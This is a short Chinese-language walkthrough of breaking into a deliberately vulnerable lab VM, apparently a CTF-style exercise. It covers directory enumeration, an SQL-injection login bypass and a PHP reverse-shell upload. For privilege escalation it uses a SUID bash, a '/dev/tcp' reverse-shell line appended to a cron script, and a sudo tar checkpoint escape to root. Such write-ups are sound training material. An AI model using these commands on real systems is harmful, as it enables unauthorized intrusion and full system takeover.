环境准备
靶机链接:百度网盘 请输入提取码
提取码:h4xk
虚拟机网络链接模式:桥接模式
攻击机系统:kali linux 2021.1
信息收集
用nmap命令探测目标靶机开放端口和服务
漏洞利用
1.用gobuster探测目录,没探测出来
2.换成7080端口开始探测
gobuster dir -u http://192.168.1.107:7080 \ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak
3.login.php是一个登录界面
4.尝试SQL注入漏洞
点俩次放包,页面就进去了
5.成功登录进去,寻找可利用信息,和上传点
6.发现一个上传点
7.在本地开启监听,尝试上传我们的php-reverse-shell.php(github里有),发现上传路径。
8.访问路径,成功反弹shell
权限提升
1.用python反弹一个交互式shell
python -c "import pty;pty.spawn('/bin/bash')"
2.寻找有suid执行权限的文件,发现有一个/bin/bash
find / -perm -u=s -type f 2>/dev/null
3.用-p提权上来发现euid变为了eren用户,那就可以进入用户目录,有一个backup.sh文件eren用户权限是可读可写可执行。
echo 'bash -i >& /dev/tcp/192.168.1.106/4444 0>&1' >> backup.sh
4.把反弹shell的命令写入.sh文件中,等待反弹。
时间有点长,用命令查看大概五分钟
cat /etc/crontab
5.成功提权为eren用户
sudo -l 查看可执行命令
sudo /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
6.成功进入root,轻松拿下!!!